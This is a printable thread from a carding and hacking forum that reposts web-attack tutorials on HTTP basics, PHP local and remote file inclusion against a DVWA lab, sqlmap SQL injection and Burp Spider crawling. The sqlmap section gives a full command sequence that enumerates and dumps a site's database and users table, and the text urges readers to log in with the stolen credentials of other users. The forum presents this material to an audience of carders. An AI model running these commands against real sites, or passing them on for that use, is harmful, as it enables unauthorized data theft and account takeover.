Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to Understanding the HTTP Protocol - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Understanding the HTTP Protocol (/Thread-Guide-How-to-Understanding-the-HTTP-Protocol)



[Guide] How to Understanding the HTTP Protocol - NINZA - 05-02-2020

HTTP (Hyper Text Transfer Protocol) is basically a client-server protocol, wherein the client (web browser) makes a request to the server and in return, the server responds to the request. The response by the server is mostly in the form of HTML formatted pages. HTTP protocol by default uses port 80, but the web server and the client can be configured to use a different port.
HTTP is a stateless protocol which means that the server does not retain the information from each user. HTTP is the backbone of the World Wide Web (www) and for it being stateless simply means that it does not remember each and every client that connects to the internet and it does not matter if a single user sends multiple requests one after another, they all will still be treated as independent requests by the server.
We are currently using HTTP 2, its predecessors were HTTP 1.0 and 1.1, and the major differences between 1.X and 2, at a higher level, are:
  • Http 2 is binary and not textual
  • Http 2 is multiplexed, it can use a single connection for parallelism, Http one, on the other hand, is based on ordering and blocking.
  • Http 2 uses compression in its headers to reduce the overhead.
  • Http2 gives servers the capability to “push” responses to client servers proactively.
HTTP works through different methods and these methods are:
HTTP Request Methods
Method
Description
GET
Used to retrieve information from the given URL
POST
Used to send data to the server, for example, customer information, file upload, etc. using HTML forms
DELETE
Delete a File of the specified URL
PUT
Uploads a File of the specified URL
TRACE
Trace on the jsp resource returns the content of the resource.
HEAD
GET only HTTP headers and no document body
OPTIONS
HTTP methods that the server supports
There is a major difference between GET and POST method which people fail to understand. Once you understand these properly, you can manipulate and increase the security of your web application. The differences are as follows:
GET
POST
Get request can be cached
Post request are never cached
Remain in the browser history
Do not remain in the browser history
It can be bookmarked
It cannot be bookmarked
Get request should never be used when dealing with sensitive data
The post should always be used for sensitive data
Get request has a length restriction
post request has no length restriction
Get request should be used to retrieve data

It is less secure
It is more secure
An HTTP client sends an HTTP request to a server in the form of a request message which includes the following format

[To see content please register here]

GET / HTTP/1.1
Host: yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

1
2
3
4
5
6
7
8
9

[To see content please register here]

GET / HTTP/1.1
Host: yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

There are several fields in the header, but we will discuss the more important ones:
Host: This field is in the header and it is used to identify individual website by a hostname if they are sharing the same IP address. The client web browser also sets a user-agent string to identify the type and version of the browser.
User-Agent: This field is set correctly to its default values by the web browser, but it can be spoofed by the end user. This is usually done by the malicious user to retrieve contents designed for other types of web browsers.
Cookie: This field stores a temporary value shared between the client and server for session management.
Referer: This is another important field that you would often see when you are redirected from one URL to another. This field contains the address of the previous web page from which a link to the current page was followed. Attackers manipulate the Referer field using an XSS attack and redirect the user to a malicious website.
Accept-Encoding: This field defines the compression scheme supported by the client; gzip and Deflate are the most common ones. There are other parameters too, but they are of little use to penetration testers.
Response
Response: When a request is sent to the server; the server replies in the form of response. Following is an example of a response:
HTTP/1.1 200 OK
Date: Sat, 10 Jun 2017 05:17:18 GMT
Set-Cookie: autorf=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/;
domain=in.yahoo.com
Content-Type: text/html; charset=UTF-8
Server: ATS
Expires: -1
Content-Length: 477864

1
2
3
4
5
6
7
8

HTTP/1.1 200 OK
Date: Sat, 10 Jun 2017 05:17:18 GMT
Set-Cookie: autorf=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/;
domain=in.yahoo.com
Content-Type: text/html; charset=UTF-8
Server: ATS
Expires: -1
Content-Length: 477864

HTTP Response Code: The Status-Code element is a 3-digit integer where the first digit of the Status-Code defines the class of response and the last two digits do not have any categorization role. There are 5 values for the first digit
Code
Meaning
Example
1xx
Information
100: server agrees to handle a client request.
2xx
Success
200: request succeeded.

204: no client present.
3xx
Redirection
301: page moved.

304: cached page still available.
4xx
Client error
403: forbidden page.

404: page not found.
5xx
Server error
500: internal server error.

503: try again later.
HTTP Version: A server supporting HTTP version 1.1 will return the following version information
Date: The date and time that the message was originated
Set-Cookie: This field, if defined, will contain a random value that can be used by the server to identify the client and store temporary data
Server: This field is of interest to a penetration tester and will help in the recon phase of a test. It displays useful information about the web server hosting the website.
Content-Length: This field will contain a value indicating the number of bytes in the body of the response. It is used so that the other party can know when the current request/response has finished.
Source:

[To see content please register here]


[To see content please register here]


[To see content please register here]



You can insert the content of one PHP file into another PHP file before the server executes it, with the include () function. The function can be used to create functions, headers, footers or element that will be reused on multiple pages.
This will help developers to make it easy to change the layout of a complete website with minimal effort.
If there is any change required then instead of changing thousands of files just change the included file.
Assume we have a standard footer file called “footer.php“, that looks like this
<?php
echo "<p>Copyright &copy; 2010-" . date("Y") . " hackingartices.in</p>";
?>

1
2
3

<?php
echo "<p>Copyright &copy; 2010-" . date("Y") . " hackingartices.in</p>";
?>


Example 1
To include the footer file in a page, use the include statement
<html>
<body>
<h1>Welcome to Hacking Articles</h1>
<p>Some text.</p>
<p>Some more text.</p>
<?php include 'footer.php';?>
</body>
</html>

1
2
3
4
5
6
7
8

<html>
<body>
<h1>Welcome to Hacking Articles</h1>
<p>Some text.</p>
<p>Some more text.</p>
<?php include 'footer.php';?>
</body>
</html>


Example 2
Assume we have a file called “vars.php“, with some variables defined:
<?php
$color='red';
$car='BMW';
?>

1
2
3
4

<?php
$color='red';
$car='BMW';
?>


<html>
<body>
<h1>Welcome to my home page!</h1>
<?php include 'vars.php';
echo "I have a $color $car.";
?>
</body>
</html>

1
2
3
4
5
6
7
8

<html>
<body>
<h1>Welcome to my home page!</h1>
<?php include 'vars.php';
echo "I have a $color $car.";
?>
</body>
</html>

Output: I have red BMW
PHP Require Function
The require statement is also used to include a file into the PHP code.
However, there is one big difference between include and require; when a file is included with the include statement and PHP cannot find it, the script will continue to execute:
Example 3

<html>
<body>
<h1>Welcome to my home page!</h1>
<?php include 'noFileExists.php';
echo "I have a $color $car.";
?>
</body>
</html>

1
2
3
4
5
6
7
8

<html>
<body>
<h1>Welcome to my home page!</h1>
<?php include 'noFileExists.php';
echo "I have a $color $car.";
?>
</body>
</html>

Output: I have a Red BMW
If we do the same example using the require statement, the echo statement will not be executed because the script execution dies after the require statement returned a fatal error:
<html>
<body>
<h1>Welcome to my home page!</h1>
<?php require 'noFileExists.php';
echo "I have a $color $car.";
?>
</body>
</html>

1
2
3
4
5
6
7
8

<html>
<body>
<h1>Welcome to my home page!</h1>
<?php require 'noFileExists.php';
echo "I have a $color $car.";
?>
</body>
</html>

No output result
PHP Required_once Function
Require_once() using this function we can access the data of another page once when you may need to include the called file more than once, It works the same way. The only difference between require and require_once is that If it is found that the file has already been included, calling script is going to ignore further inclusions.
Example 4

echo.php
<?php
echo "Hello";
?>

1
2
3
4

echo.php
<?php
echo "Hello";
?>

test.php
<?php
require('echo.php');
require_once('echo.php');
?>

1
2
3
4

<?php
require('echo.php');
require_once('echo.php');
?>

outputs: “Hello”
Note
allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is also disabled
You can enable allow_url_include from php.ini
/etc/php7/apache2/php.ini
allow_url_include = On

1
2

/etc/php7/apache2/php.ini
allow_url_include = On


File Inclusion Attacks
It is an attack that allows an attacker to include a file on the web server through a php script. This vulnerability arises when a web application lets the client submit input into files or upload files to the server.
This can lead to the following attacks:
  • Code execution on the web server
  • Cross Site Scripting Attacks (XSS)
  • Denial of service (DOS)
  • Data Manipulation Attacks
Two Types:
  • Local File Inclusion
  • Remote File Inclusion
Local File Inclusion (LFI)
Local file inclusion vulnerability occurs when a file to which to PHP account has accessed is passed as a parameter to the PHP function “include”, or “require_once”
[Image: 1.png?w=687&ssl=1]
This vulnerability occurs, for example, when a page receives, as inputs the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.
Example – Local File Inclusion

[To see content please register here]


1

[To see content please register here]


[Image: 2.png?w=687&ssl=1]

[To see content please register here]


1

[To see content please register here]


[Image: 3.png?w=687&ssl=1]
Read complete local file inclusion attack tutorial from

[To see content please register here]


Remote File Inclusion (RFI)
Remote File Inclusion occurs when the URI of a file located on a different server is passed to as a parameter to the PHP function “include”, “include_once”, “require”, or “require_once”. PHP incorporates the content into the pages. If the content happens to be PHP source code, PHP executes the file.
PHP Remote File inclusion allows an attacker to embed his/her own PHP code inside a vulnerable  PHP script, which may lead to disastrous results such as allowing the attacker to execute remote commands on the web server, deface parts of the web or even steal confidential information.

[To see content please register here]

http:// 192.168.1.8/dvwa/vulnerabilities/fi/?page=http://google.com

1
2

[To see content please register here]

http:// 192.168.1.8/dvwa/vulnerabilities/fi/?page=http://google.com

[Image: 4.png?w=687&ssl=1]
Mitigation
  • Strong Input Validation
  • A whitelist of acceptable inputs
  • Reject any inputs that do not strictly conform to specifications
  • For filenames, use stringent whitelist that limits the character set to be used
  • Exclude directory separators such as “/”
  • Use a whitelist of allowable file extensions
  • Environment Hardening
  • Develop and run your code in the most recent versions of PHP available
  • Configure your PHP applications so that it does not use register_globals
  • Set allow_url_fopen to false, which limits the ability to include files from remote locations
  • Run your code using the lowest privileges
  • Use a vetted library or framework that does not allow this weakness.
Source:

[To see content please register here]


             

[To see content please register here]


             

[To see content please register here]



sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port, and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain a string like a name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’sMeterpreter getsystem command.
[Image: 1.png?w=687&ssl=1]
These options can be used to enumerate the back-end database management system information, structure, and data contained in the tables.
[Image: 2.png?w=687&ssl=1]
Sometimes you visit such websites that let you select product item through their picture gallery if you observer its URL you will notice that product item is called through its product-ID numbers.
Let’s take an example

[To see content please register here]


1

[To see content please register here]


So when attacker visits such kind of website he always checks for SQL vulnerability inside web server for lunching SQL attack.
[Image: 3.png?w=687&ssl=1]
Let’s check how attacker verifies SQL vulnerability.
The attacker will try to break the query in order to order to get the error message, if he successfully received an error message then it confirms that web server is SQL injection affected.

[To see content please register here]

'

1

[To see content please register here]

'

From the screenshot you can see we have received error message successfully now we have made SQL attack on a web server so that we can fetch database information.
[Image: 4.1.png?w=687&ssl=1]
Databases
For database penetration testing we always choose SQLMAP, this tool is very helpful for beginners who are unable to retrieve database information manually or unaware of SQL injection techniques.
Open the terminal in your Kali Linux and type following command which start SQL injection attack on the targeted website. 
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
1
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

-u:  target URL
–dbs: fetch database name
–batch: This will leave sqlmap to go with default behavior whenever user’s input would be required
[Image: 4.png?w=687&ssl=1]
Here from the given screenshot, you can see we have successfully retrieve database name “acuart
[Image: 5.png?w=687&ssl=1]
Tables
As we know a database is a set of record which consist of multiple tables inside it therefore now use another command in order to fetch entire table names from inside the database system.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --table --batch
1
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --table --batch

-D: DBMS database to enumerate (fetched database name)
–tables: enumerate DBMS database table
[Image: 6.png?w=687&ssl=1]
As a result, given in screenshot, we have enumerated entire table name of the database system. There are 8 tables inside the database “acuart” as following:
T1: artists
T2: carts
T3: categ
T4: featured
T5: guestbook
T6: pictures
T7: products
T8: users
[Image: 7.png?w=687&ssl=1]
Columns
Now further we will try to enumerate the column name of the desired table. Since we know there is a users table inside the database acuart and we want to know all column names of users table, therefore, we will generate another command for column captions enumeration.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
1
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

-T: DBMS table to enumerate (fetched table name)
–columns: enumerate DBMS database columns
[Image: 8.png?w=687&ssl=1]
[Image: 9.png?w=687&ssl=1]
Get data from a table
Slowly and gradually we have penetrated many details of the database but last and most important step is to retrieve information from inside the columns of a table. Hence, at last, we will generate a command which will dump information of users table.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
1
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

–dump: dump all information of DBMS database
[Image: 10.png?w=687&ssl=1]
Here from the given screenshot, you can see it has to dump entire information of table users, mainly users table contains login credential of other users. You can use these credential for login into the server on behalf of other users.
[Image: 12.png?w=687&ssl=1]
Dump All
The last command is the most powerful command in sqlmap which will save your time in database penetration testing; this command will perform all the above functions at once and dump entire database information including table names, column and etc.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch
1
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch

[Image: 13.png?w=687&ssl=1]
This will give you all information at once which contains database name as well as table’s records.
Try it yourself!!!
[Image: 14.png?w=687&ssl=1]

Hello friends! Today we are doing web penetration testing using burp suite spider which very rapidly crawls entire web application and dumps the formation of targeted website.
Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.
Source:

[To see content please register here]


Let’s begin!!
The first attacker needs to configure the browser and burp proxy to work properly,

[To see content please register here]

will my targeted web site for enumeration.

[Image: 1.png?w=687&ssl=1]
The form is given below screenshot you can see currently there is no targeted website inside site map of burp suite. To add your targeted web site inside it you need to fetch the http request sent by the browser to the web application server, using intercept option of the proxy tab.
Click on the Proxy tab and turn on intercept in order to catch http request.
[Image: 2.png?w=687&ssl=1]
Here you can observe that I had fetched the http request of

[To see content please register here]

; now send to spider with help of action tab.

[Image: 3.png?w=687&ssl=1]
Confirm your action by making click on YES; Burp will alter the existing target scope to include the preferred item, and all sub-items contained by the site map tree.
[Image: 5.png?w=687&ssl=1]
Now choose spider tab for a further step, here you will find two subcategories control tab and option.
Burp Spider – Control Tab
This tab is used to start and stop Burp Spider, monitor its progress, and define the spidering scope.
Spider Status
Use these settings to monitor and control Burp Spider:
  • Spider is paused/running– This toggle button is used to start and stop the Spider. While the Spider is stopped it will not make any requests of its own, although it will continue to process responses generated via Burp Proxy (if passive spidering is enabled), and any newly-discovered items that are within the spidering scope will be queued to be requested if the Spider is restarted.
  • Clear queues– If you want to reprioritize your work, you can completely clear the currently queued items, so that other item can be added to the queue. Note that the cleared items may be re-queued if they remain in-scope and the Spider’s parser encounters new links to the items.
Spider Scope
This panel lets you define exactly what is in the scope for the Spider to request.
The best way to handle spidering scope is normally using the suite-wide target scope, and by default, the Spider will use that scope.
Burp Spider Options
This tab contains options for the basic crawler settings, passive spidering, form submission, application login, the Spider engine, and HTTP request headers.
[Image: 6.png?w=687&ssl=1]
You can monitor the status of the Spider when running, via the Control tab. Any newly discovered content will be added to the Target site map.
When spidering a selected branch of the site map, Burp will carry out the following actions (depending on your settings):
  • Request any unrequested URLs already present within the branch.
  • Submit any discovered forms whose action URLs lay within the branch.
  • Re-request any items in the branch that previously returned 304 status codes, to retrieve fresh (uncached) copies of the application’s responses.
  • Parse all content retrieved to identify new URLs and forms.
  • Recursively repeat these steps as new content is discovered.
  • Continue spidering all in-scope areas until no new content is discovered.
Hence you can see the targeted website has been added inside the site map as a new scope for web crawling. Choose spider this host option by making right click on selected URL which automatically starts web crawling.
[Image: 7.png?w=687&ssl=1]
When you click on preferred target site map further content which has been discovering by the spider will get added inside it as shown in the given image below.
Form screenshot you can see its dump all items of web site even by throwing request and response of the host.
[Image: 8.png?w=687&ssl=1]